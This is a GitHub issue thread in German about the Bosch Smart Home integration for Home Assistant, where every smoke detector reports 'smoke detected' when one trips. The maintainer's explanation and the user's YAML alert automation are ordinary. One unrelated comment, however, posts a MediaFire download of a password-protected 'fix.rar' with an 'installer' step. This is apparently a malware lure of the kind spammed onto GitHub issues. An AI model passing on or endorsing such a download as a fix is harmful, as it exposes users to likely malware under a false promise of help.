### ISSUE TITLE
Rauchmelder bringen alle einen Alarm im HA

### ISSUE THREAD

**Issue by matzidp8** [tschamm/boschshc-hass#191]
Hallo,

ich habe mir zwei Automationen Einbruch und Brandalarm angelegt. Die mir eine Pushnachricht und eine WhatsApp an unsere Handys senden mit dem Auslöser den es betrifft.

Auslöser bei Einbruchalram ist der jeweilige Sensor wie Türkontakt oder BM, als Bedingung nur wenn **Intrusion Detection System aktiv** ist, also Alarmanalge ein ist.

Auslöser bei Bei Brandalarm sind alle Rauchmelder. 

Am Handy habe ich Marocdroid, dass wiederum als Automation das Handy auf laut stellt, einen Alarm auslöst und den Auslöser der per Push Nachricht kam, laut vorliest und anzeigt. Somit weis ich was passiert ist und wo, auch wenn das Handy mal auf stumm ist.

Allerdings machen mir die Rauchmelder eine Strich durch die Rechnung. Bei Einbruchalram lösten auch die Rauchmelder mit **Rauch erkannt** aus, da diese ja als Sirene in der Bosch App aktiviert sind. Und im HA lösen Sie als **Rauch erkannt** aus.
Dies habe ich gelöst in dem ich bei der Automation Brandalaram noch einen Nicht Bedingung **"Intrusion Detection System wurde ausgelöst"** eingefügt habe. Somit prüft die Automation ob gerade **Einbruchalram** war und das war es ja und somit kommt keine Push Nachricht. Sondern nur von der Automation Einbruchalarm.

Jetzt habe ich mal die Automation Brandalarm getestet, indem ich einen Rauchmelder aulösen lies. Allerdings lösen alle aus, da bei allen **Rauch erkannt** im HA kommt, weil ja alle losgehen.

Besser wäre natürlich wenn im HA nur der auslöst, der auch ausgelöst hat.
Ich dachte schon ok schaust mal auf die Entität **"SmokeDetectionSystem"** aber die bringt nur **Rauch erkannt**, und nicht welcher Rauchmelder.

Hat da jemand eine Idee?

Bei uns im Tierheim habe ich Homematic IP im Einsatz, hier funktioniert es, da nur von dem Rauchmelder eine Meldung zum HA kommt der auch wirklich auslöst.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by tschamm** [comment]
Hi,
the binary sensor is testing if the state of the smoke detector is `IDLE_OFF`, if this isn’t the case it reports a smoke detection event. 
The API provides information for `PRIMARY` and `SECONDARY` trigger events, where Primary reflects the entity which reports the smoke alarm.  You suggest to ignore secondary triggers in HA?

**Comment by matzidp8** [comment]
Nein es ist schon gut das alle RM auslösen, aber das Problem ist das alle RM den gleichen Status **Rauch erkannt** im HA haben.

Gut wäre wenn nur der RM der ausgelöst hat diesen Status bekommt, damit man weis welcher der Auslöser war. Und die anderen einen anderen Status wie z.B. **ausgelöst durch RM Wohnzimmer** oder so ähnlich bekommen. 

Oder auch eine Möglichkeit wäre das die Entität **"SmokeDetectionSystem"** einen Status bekommt welcher RM ausgelöst hat.

**Comment by matzidp8** [comment]
```
alias: Brandalarm alle RM Push Nachricht
description: ""
trigger:
  - type: smoke
    platform: device
    device_id: db570357de0.......
    entity_id: 35a31e9a0487........
    domain: binary_sensor
  - type: smoke
    platform: device
    device_id: 7a9b2689424a.....
    entity_id: 79432117366345......
    domain: binary_sensor
  - type: smoke
    platform: device
    device_id: 81de3b293caa.....
    entity_id: 6b060ee92bc.....
    domain: binary_sensor
  - type: smoke
    platform: device
    device_id: 9d79e185......
    entity_id: c3f7b21df......
    domain: binary_sensor
  - type: smoke
    platform: device
    device_id: 1726619f42df.....
    entity_id: 41127395ff6e......
    domain: binary_sensor
  - type: smoke
    platform: device
    device_id: 14110f7066e.....
    entity_id: 69ae2fdd5f002.....
    domain: binary_sensor
condition:
  - condition: not
    conditions:
      - condition: device
        device_id: 8745a86c83ee4644c......
        domain: alarm_control_panel
        entity_id: 31f48415d882a0a9.....
        type: is_triggered
action:
  - data:
      message: Brandalarm Zuhause, {{ trigger.to_state.name }}
      data:
        ttl: 0
        priority: high
    action: notify.mobile_app_matzi_sm_s901b
  - data:
      message: Brandalarm Zuhause, {{ trigger.to_state.name }}
      data:
        ttl: 0
        priority: high
    action: notify.mobile_app_yvi_sm_s901b
    enabled: false
  - delay:
      hours: 0
      minutes: 0
      seconds: 5
      milliseconds: 0
  - data:
      message: Brandalarm Zuhause, *{{ trigger.to_state.name }}.*
    action: notify.whatsapp_matzi
  - data:
      message: Brandalarm Zuhause, *{{ trigger.to_state.name }}.*
    action: notify.whatsapp_yvi
    enabled: false
mode: single
```
